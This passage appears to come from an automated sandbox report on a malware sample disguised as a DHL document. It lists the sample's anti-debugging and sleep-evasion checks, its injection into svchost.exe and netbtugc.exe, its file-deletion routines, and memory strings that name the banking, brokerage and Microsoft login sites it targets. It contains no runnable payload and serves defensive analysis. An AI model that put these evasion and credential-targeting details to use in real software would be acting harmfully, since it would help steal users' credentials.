            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe TID: 6768Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe TID: 6768Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0088DBBE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0085C2A2 FindFirstFileExW,0_2_0085C2A2
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008968EE FindFirstFileW,FindClose,0_2_008968EE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0089698F
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0088D076
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0088D3A9
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00899642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00899642
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0089979D
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00899B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00899B2B
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00895C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00895C97
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008242DE
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: firefox.exe, 00000007.00000002.2514990770.0000021DA13AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,11696428655f
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,116g
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: MPhqOtiHUlL.exe, 00000006.00000002.4523808032.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,116964286u!c
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089EAA2 BlockInput,0_2_0089EAA2
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00852622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00852622
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008242DE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00844CE8 mov eax, dword ptr fs:[00000030h]0_2_00844CE8
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00B65180 mov eax, dword ptr fs:[00000030h]0_2_00B65180
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00B65120 mov eax, dword ptr fs:[00000030h]0_2_00B65120
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00B63B00 mov eax, dword ptr fs:[00000030h]0_2_00B63B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
